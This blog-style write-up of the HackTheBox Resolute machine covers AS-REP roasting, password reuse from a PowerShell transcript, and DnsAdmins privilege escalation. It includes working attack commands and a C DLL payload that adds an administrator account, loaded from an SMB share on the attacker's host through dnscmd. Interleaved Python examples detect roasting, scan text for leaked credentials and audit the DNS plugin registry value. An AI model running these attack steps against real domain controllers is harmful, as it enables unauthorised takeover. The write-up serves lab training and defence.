The Fuzz.
CTF Writeups

HTB: Resolute — From AS-REP Roasting to DnsAdmins Privilege Escalation

A clean walkthrough of HackTheBox's Resolute box. Enumeration, AS-REP roast, lateral movement via password reuse, and DLL injection through DnsAdmins.

$ author 0xFuzz · Apr 18, 2026 · 11 min read
Tags: htb, active-directory, dnsadmins, kerberos

Resolute is a classic Active Directory box on HackTheBox. Nothing here is novel, but it stitches three real-world primitives together cleanly: AS-REP roasting, password reuse, and DnsAdmins DLL injection. A good warm-up before any AD assessment.

Recon

nmap finds the usual AD services — Kerberos, LDAP, SMB, WinRM. Anonymous LDAP gives us a user list and an interesting comment field on user melanie.

nmap.sh
$ nmap -p- --min-rate 5000 -sV 10.10.10.169
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap          Active Directory LDAP (megabank.local)
445/tcp   open  microsoft-ds
5985/tcp  open  http          WinRM

LDAP description on melanie: "Account created. Password: Welcome123!"

AS-REP roasting

Welcome123! doesn't actually work for melanie, but the user list is gold. We sweep for AS-REP-roastable accounts — accounts with "Do not require Kerberos preauthentication" set.

asrep.sh
$ GetNPUsers.py megabank.local/ -usersfile users.txt -no-pass
[*] no preauth: melanie@megabank.local
$krb5asrep$23$melanie@MEGABANK.LOCAL:af1b...:8f02...
 
$ hashcat -m 18200 hash rockyou.txt
$krb5asrep$23$melanie@...:Welcome123!

Welcome123! works for melanie. WinRM is open, so we drop straight to a shell with evil-winrm.
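The detection side of the same primitive, as an added example (not code from this post or from impacket). It checks the two signals a defender has: the userAccountControl bit that makes an account roastable (0x400000, DONT_REQ_PREAUTH, which is what GetNPUsers.py keys on), and the Security log signature of the request itself, a 4768 TGT request with Pre-Authentication Type 0 and RC4-HMAC (etype 0x17, the same `$23$` that appears in the writeup's hash). The account list and the event lines are constructed; the events use a simplified key=value rendering of 4768 fields, so `parse_event()` is the part to swap for your own EVTX/XML pipeline.

```python
"""Defender-side checks for AS-REP roasting.

Added example for this writeup, not code from the post or from impacket.
Two independent signals:
  1. Directory hygiene: userAccountControl bit 0x400000 (DONT_REQ_PREAUTH)
     makes an account roastable; this is what GetNPUsers.py relies on.
  2. Telemetry: a TGT request (Security event 4768) with Pre-Authentication
     Type 0 and RC4-HMAC (0x17) ticket encryption is the roast signature.
The event lines below are a constructed key=value rendering of 4768 fields;
real events come out of EVTX as XML, so adapt parse_event() to your pipeline.
"""
import re

DONT_REQ_PREAUTH = 0x400000   # ADS_UF_DONT_REQUIRE_PREAUTH

# Constructed sample of (sAMAccountName, userAccountControl) pairs.
SAMPLE_ACCOUNTS = [
    ("ryan", 0x10200),         # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("melanie", 0x410200),     # same, plus DONT_REQ_PREAUTH -> roastable
    ("svc_backup", 0x400200),  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH -> roastable
]

# Constructed sample events. 10.10.14.5 is the attacker box from the writeup;
# the other address is made up. The 4771 line is a distractor the rule ignores.
SAMPLE_EVENTS = [
    "4768 TargetUserName=ryan ServiceName=krbtgt PreAuthType=2 "
    "TicketEncryptionType=0x12 IpAddress=10.10.10.20",
    "4768 TargetUserName=melanie ServiceName=krbtgt PreAuthType=0 "
    "TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "4771 TargetUserName=melanie FailureCode=0x18 IpAddress=10.10.14.5",
    "4768 TargetUserName=svc_backup ServiceName=krbtgt PreAuthType=0 "
    "TicketEncryptionType=0x17 IpAddress=10.10.14.5",
]


def roastable_accounts(accounts):
    """Names whose UAC bitmask disables Kerberos pre-authentication."""
    return [name for name, uac in accounts if uac & DONT_REQ_PREAUTH]


def parse_event(line):
    """Turn '4768 k=v k=v ...' into a dict with an integer EventID, else None."""
    event_id, _, rest = line.strip().partition(" ")
    if not event_id.isdigit():
        return None
    fields = dict(re.findall(r"(\w+)=(\S+)", rest))
    fields["EventID"] = int(event_id)
    return fields


def asrep_roast_alerts(lines):
    """(user, source IP) for every 4768 that looks like an AS-REP roast."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["EventID"] != 4768:
            continue
        no_preauth = ev.get("PreAuthType") == "0"
        rc4 = ev.get("TicketEncryptionType", "").lower() == "0x17"
        if no_preauth and rc4:
            alerts.append((ev["TargetUserName"], ev["IpAddress"]))
    return alerts


def sweep_sources(alerts, min_accounts=2):
    """Source IPs that roasted at least min_accounts distinct users: a user-list sweep."""
    users_by_ip = {}
    for user, ip in alerts:
        users_by_ip.setdefault(ip, set()).add(user)
    return sorted(ip for ip, users in users_by_ip.items() if len(users) >= min_accounts)


if __name__ == "__main__":
    print("roastable accounts:", roastable_accounts(SAMPLE_ACCOUNTS))
    hits = asrep_roast_alerts(SAMPLE_EVENTS)
    print("roast-shaped TGT requests:", hits)
    print("sweeping sources:", sweep_sources(hits))
```

The UAC check is the fix, not just the alert: clearing DONT_REQ_PREAUTH on every account that does not document a reason for it removes the primitive entirely, and the `sweep_sources()` grouping is what separates a single odd client from a `-usersfile` sweep like the one in this post.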

Lateral to ryan

On the box, a hidden directory at C:\PSTranscripts contains an old transcript with ryan's password in cleartext. Password reuse across accounts is the entire lesson here.

transcript.ps1
PS> Get-ChildItem -Force C:\
d-----   PSTranscripts
 
PS> Get-Content C:\PSTranscripts\...\20191203...txt
# ...net use \\fs01 /user:ryan Serv3r4Admin4cc123!...
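Both credential leaks on this box, the password in melanie's LDAP description and ryan's password in a PowerShell transcript, are the same class of problem: a secret sitting in free text that the right regex finds. The scanner below is an added example, not tooling from this post, covering both passages. Its inputs are constructed: the description text for melanie is quoted from the writeup, the transcript passwords are made up, and the transcript layout follows what Start-Transcript writes.

```python
"""Scan free-text fields for credentials: LDAP description attributes and
PowerShell transcripts.

Added example for this writeup, not the post's own tooling. It covers the two
leaks the box turns on: a password typed into an account's description
attribute, and a `net use ... /user:` command captured by transcript logging.
Sample inputs are constructed.
"""
import re

# net use [drive:] \\server\share /user:NAME PASSWORD  (password is positional)
NET_USE_RE = re.compile(
    r"net\s+use\s+(?:\S+\s+)+?/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I)
# ConvertTo-SecureString 'plain' -AsPlainText
SECURESTRING_RE = re.compile(
    r"ConvertTo-SecureString\s+(?:-String\s+)?['\"](?P<secret>[^'\"]+)['\"]\s+-AsPlainText", re.I)
# "Password: x", "password=x", "-Password x", "/p:x"
PASSWORD_FIELD_RE = re.compile(
    r"(?:password\s*[:=]|-Password|/p:)\s*['\"]?(?P<secret>[^\s'\"]+)", re.I)

PATTERNS = [
    ("net-use", NET_USE_RE),
    ("securestring-plaintext", SECURESTRING_RE),
    ("password-field", PASSWORD_FIELD_RE),
]

# Constructed LDAP dump: (sAMAccountName, description).
SAMPLE_DESCRIPTIONS = [
    ("ryan", "Server admin"),
    ("melanie", "Account created. Password: Welcome123!"),
]

# Constructed transcript lines, in the layout Start-Transcript writes.
SAMPLE_TRANSCRIPT = [
    "**********************",
    "Windows PowerShell transcript start",
    "Start time: 20191203063201",
    r"Username: MEGABANK\ryan",
    "**********************",
    r"PS>net use \\fs01 /user:ryan Hunter2Plus!",
    r"PS>Get-ChildItem C:\Users",
    "PS>ConvertTo-SecureString 'S3cretB4ckup!' -AsPlainText -Force",
    r"PS>net use Z: \\fs01\share /user:megabank\svc_backup *",
    "PS>$cred = Get-Credential",
]


def mask(secret):
    """Keep the first character so analysts can correlate, hide the rest."""
    return secret[0] + "*" * (len(secret) - 1)


def scan_lines(lines):
    """Return (line_no, kind, user, masked_secret) for each credential found."""
    findings = []
    for n, line in enumerate(lines, 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            secret = m.group("secret")
            if secret == "*":           # `net use ... *` prompts; nothing leaked
                continue
            user = m.groupdict().get("user")
            findings.append((n, kind, user, mask(secret)))
            break                       # one finding per line is enough
    return findings


def scan_descriptions(accounts):
    """(sAMAccountName, kind) for accounts whose description carries a secret."""
    out = []
    for name, description in accounts:
        for _, kind, _, _ in scan_lines([description]):
            out.append((name, kind))
    return out


if __name__ == "__main__":
    print("description leaks:", scan_descriptions(SAMPLE_DESCRIPTIONS))
    for line_no, kind, user, masked in scan_lines(SAMPLE_TRANSCRIPT):
        print(f"transcript line {line_no}: {kind} user={user} secret={masked}")
```

Findings are masked on purpose: a scanner that copies cleartext passwords into a ticketing system just creates a second `C:\PSTranscripts`. Transcript directories should be ACL'd to administrators and the transcripts shipped off the host, but the real fix for ryan's case is that the `net use` password should never have been typed interactively in the first place.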

DnsAdmins to SYSTEM

ryan is a member of DnsAdmins. The classic primitive: register a malicious DLL as the DNS server's plugin, restart the service, and the DLL runs as SYSTEM.

payload.c
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Loaded by the DNS service as its server-level plugin, so this runs as SYSTEM. */
BOOL WINAPI DllMain(HMODULE h, DWORD reason, LPVOID r) {
    (void)h; (void)r;   /* unused */
    if (reason == DLL_PROCESS_ATTACH) {
        system("net user fuzz Pwned1! /add");
        system("net localgroup administrators fuzz /add");
    }
    return TRUE;
}
register-and-restart.ps1
PS> dnscmd.exe /config /serverlevelplugindll \\10.10.14.5\share\payload.dll
PS> sc.exe stop dns ; sc.exe start dns
# fuzz is now Administrators. Pop a shell as fuzz.
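What a defender watches for here is the registry value that `dnscmd /config /serverlevelplugindll` writes: `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll`. On a normal DC that value does not exist, so its mere presence is alert-worthy, and the path tells you how bad it is (a UNC path like the one above means the DLL is being pulled over SMB from another host). The audit below is an added example, not tooling from this post. The snapshot of DC values is constructed; on a real DC you would read the value with reg.exe or the winreg module and feed it in.

```python
r"""Audit the DNS Server's ServerLevelPluginDll value.

Added example for this writeup, not the post's own tooling. `dnscmd /config
/serverlevelplugindll <path>` stores the path in the registry value
HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll,
and the DNS service loads that DLL as SYSTEM on its next start. On a normal
DC the value does not exist, so any value at all is worth a ticket; the
classification ranks how bad it looks. The snapshot is constructed.
"""
import ntpath

PLUGIN_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"
SYSTEM32 = r"C:\Windows\System32"

# Constructed snapshot: hostname -> value (None = value absent).
SAMPLE_SNAPSHOT = {
    "DC01": None,
    "DC02": r"\\10.10.14.5\share\payload.dll",      # the path from the writeup
    "DC03": r"C:\Windows\System32\dns\plugin.dll",   # made-up local DLL
    "DC04": "payload.dll",                           # made-up relative path
}

SEVERITY = {
    "unc": "critical",               # DLL fetched over SMB from another host
    "relative": "critical",          # resolved through the DLL search order
    "outside-system32": "critical",  # anywhere a non-admin could write
    "local-system32": "review",      # unusual, but could be a vetted plugin
}


def classify_plugin_path(value):
    """Classify the value: absent, unc, relative, outside-system32 or local-system32."""
    if value is None or not value.strip():
        return "absent"
    path = value.strip().strip('"')
    if path.startswith("\\\\"):
        return "unc"
    if not ntpath.isabs(path):
        return "relative"
    norm = ntpath.normcase(path)   # lower-case, backslash-normalised comparison
    if not norm.startswith(ntpath.normcase(SYSTEM32) + "\\"):
        return "outside-system32"
    return "local-system32"


def plugin_alerts(snapshot):
    """(host, classification, severity) for every DC where the value is set."""
    alerts = []
    for host in sorted(snapshot):
        kind = classify_plugin_path(snapshot[host])
        if kind != "absent":
            alerts.append((host, kind, SEVERITY[kind]))
    return alerts


if __name__ == "__main__":
    print("checking", PLUGIN_VALUE)
    for host, kind, severity in plugin_alerts(SAMPLE_SNAPSHOT):
        print(f"{host}: {kind} ({severity})")
```

Pair the registry check with a membership audit of DnsAdmins: ryan's real problem is not the DLL but that a group whose only job is DNS administration can, by design, load code into a SYSTEM service on the DC, so membership should be as small as Domain Admins and reviewed the same way.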

Flags

type      value        note
user.txt  0a8c...e91   as melanie
root.txt  1f23...c40   as fuzz (admin)